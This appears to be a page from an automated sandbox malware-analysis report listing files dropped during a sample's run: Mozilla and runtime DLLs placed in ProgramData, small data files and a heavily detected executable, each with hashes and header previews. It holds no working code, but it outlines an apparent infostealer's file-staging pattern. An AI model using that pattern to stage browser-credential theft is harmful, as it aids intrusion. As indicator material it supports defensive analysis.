                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\rc65.dat

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:2:2
                                                                                                                                                                                                                                                                                                                                                                MD5:53DC7048BD9B93E5C0C0847898F121D7
                                                                                                                                                                                                                                                                                                                                                                SHA1:0077262067568AF2D1E43FFDAF434C2F3D589E19
                                                                                                                                                                                                                                                                                                                                                                SHA-256:6C26BE999C603064A73DA291548DFBBA47BA691DF0C288AE297895477C00921D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:A1E2525BAA6507A540280EB36E9C1F7CF369EB0C62A23875DAC51F11D1C69BFC991686CB333D2DDE30798349CA5B035028063309B975DA36C8109B8EA1014719
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:....

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\resource-a.dat

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):128
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.9545817380615236
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                                                                                                                                                                                                                                                                                                MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                                                                                                                                                                                                                                                                                                SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                                                                                                                                                                                                                                                                                                SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\resource-b.dat

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):128
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2701231977328944
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:WAmJuXDz8/:HHzc
                                                                                                                                                                                                                                                                                                                                                                MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                                                                                                                                                                                                                                                                                                                                SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                                                                                                                                                                                                                                                                                                                                SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                                                                                                                                                                                                                                                                                                                                SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:ccddf9e705966c2f471db9..........................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\ts65.dat

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ISO-8859 text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):8
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:Ln:L
                                                                                                                                                                                                                                                                                                                                                                MD5:AE79E02CE475847E4AC5D7D3CABDED31
                                                                                                                                                                                                                                                                                                                                                                SHA1:79086C0933264F57FC2FF53F9226A41CD3E6B43F
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8DE6C80E25D2BF6195DF92577877025828F0648E358B6E8F1F2BB693D69B211E
                                                                                                                                                                                                                                                                                                                                                                SHA-512:A824E3407A0F2C16C592AF2D1CC6B18853787041E5F1301A22E56062C6F8C03F3133EDAAFE4C04B4C2BDFFD08969D921D6BBA9C7545593AE87FB4DA2BE05D31F
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:...e....

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\FourthX.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2654720
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.545978188908966
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:iVkNC5+XxkQKlb0FjgS0+cywnZLIJK2egUmFbcP9ovzmiPKkv/m63KEll25OcXoZ:iVkYYXc4FUoNeIo2eaZdScKS/mQ/K6
                                                                                                                                                                                                                                                                                                                                                                MD5:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                                                                                                                                                                                                                                                                                                SHA1:A7B9A99950429611931664950932F0E5525294A4
                                                                                                                                                                                                                                                                                                                                                                SHA-256:5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                                                                                                                                                                                                                                                                                                                                                                SHA-512:21D1A5A4A218411C2EC29C9CA34CE321F6514E7CA3891EDED8C3274AEB230051661A86EDA373B9A006554E067DE89D816AA1FA864ACF0934BBB16A6034930659
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...}..e.........."......n....(.....@..........@..............................(...........`.................................................0...<.....(.......(...............(.x...............................(.......8..............X............................text...vm.......n.................. ..`.rdata..x............r..............@..@.data.....'.......'.................@....pdata........(......d(.............@..@.00cfg........(......f(.............@..@.tls..........(......h(.............@....rsrc.........(......j(.............@..@.reloc..x.....(.......(.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\356F.exe.log

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\356F.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):425
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                                                                                                                                                MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                                                                                                                                                SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                                                                                                                                                SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                                                                                                                                                SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1022
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.215200866635182
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:YqHZ6T06MhmamGgb0O0bihmVmGg6CUXyhmGNmGgbxdB6hm3mGgz0Jahm2mGgbNdh:YqHZ6T06McDTb0O0bic4TDUXycRTbxd/
                                                                                                                                                                                                                                                                                                                                                                MD5:BA8512A1180143F7620E106FB9DF5F43
                                                                                                                                                                                                                                                                                                                                                                SHA1:2EF20B9029C7C89ED134DD87F6A9403D4103031F
                                                                                                                                                                                                                                                                                                                                                                SHA-256:171640BF14335CC6403F09E4C72C11146C7393E63A9273C71B98C2D456202BA9
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2B83F9321A98090269D610D552C19B06136719FCD9F310437B2852F938DED711A1D09EABF017BF9AAEA980F68CEC6703234808A5CAB74C9A52AE4903A0DAE797
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3053123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":3043123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":3033123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3023123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3013123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3003123472,"LastSwitchedHighPart":31061843,

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll

                                                                                                                                                                                                                                                                                                                                                                Download File
